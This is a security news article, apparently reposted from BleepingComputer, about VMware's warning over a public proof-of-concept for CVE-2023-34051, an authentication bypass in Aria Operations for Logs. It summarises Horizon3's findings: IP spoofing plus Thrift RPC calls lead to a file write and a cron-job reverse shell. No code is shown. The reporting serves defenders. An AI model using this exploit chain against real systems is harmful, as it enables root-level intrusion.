VMware Security Alert: Proof-of-Concept Exploit Code Threatens Authentication Bypass Flaw

VMware has issued a warning to its customers regarding a significant threat. Proof-of-concept (PoC) exploit code is now circulating for a critical authentication bypass flaw found in vRealize Log Insight, which has since been rebranded as VMware Aria Operations for Logs.

VMware took immediate action to update its advisory, confirming the availability of the exploit code for CVE-2023-34051. This particular vulnerability presents a serious concern, as it could potentially allow unauthenticated attackers to execute code remotely with root-level permissions, under specific conditions.

The successful exploitation of this flaw relies on a series of factors. Specifically, the attacker must compromise a host within the targeted environment. This compromised host must also have the necessary permissions to add an extra interface or a static IP address, further emphasizing the importance of robust security practices and access controls.

The discovery of this flaw can be attributed to the diligent work of security researchers from Horizon3, who have conducted a detailed root cause analysis. Their findings, which were published on a recent Friday, provide additional insights into how CVE-2023-34051 can be leveraged to gain remote code execution privileges with root access. Furthermore, Horizon3’s security team has also released a PoC exploit, along with a list of indicators of compromise (IOCs) that network defenders can employ to identify any attempts at exploitation within their own environments.

The PoC exploit, as described by the Horizon3 Attack Team, relies on a combination of IP address spoofing and various Thrift RPC endpoints to achieve an arbitrary file write. Notably, the default configuration of this vulnerability involves the creation of a cron job to facilitate the generation of a reverse shell. To adapt this to specific environments, it is recommended to modify the payload file accordingly.

It’s essential to highlight that for this attack to be successful, the attacker must possess the same IP address as a master or worker node within the target network, adding an additional layer of complexity to the exploitation process.

RCE exploit chain

This vulnerability is not an isolated concern. Instead, it is part of a chain of exploits that have previously been addressed by VMware. These earlier issues were resolved in a security update issued in January. The vulnerabilities in question included a directory traversal bug (CVE-2022-31706), a broken access control flaw (CVE-2022-31704), and an information disclosure bug (CVE-2022-31711). When chained together, these vulnerabilities could allow attackers to inject maliciously crafted files into the operating system of VMware appliances running unpatched Aria Operations for Logs software.

While the exploitation of this vulnerability may seem straightforward, it’s important to note that it does require a certain level of infrastructure setup for serving malicious payloads. Additionally, since this product is typically not exposed to the public internet, attackers are likely to have established a foothold elsewhere within the network before carrying out such an attack.

Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: [email protected]

Source: bleepingcomputer.com

Source Link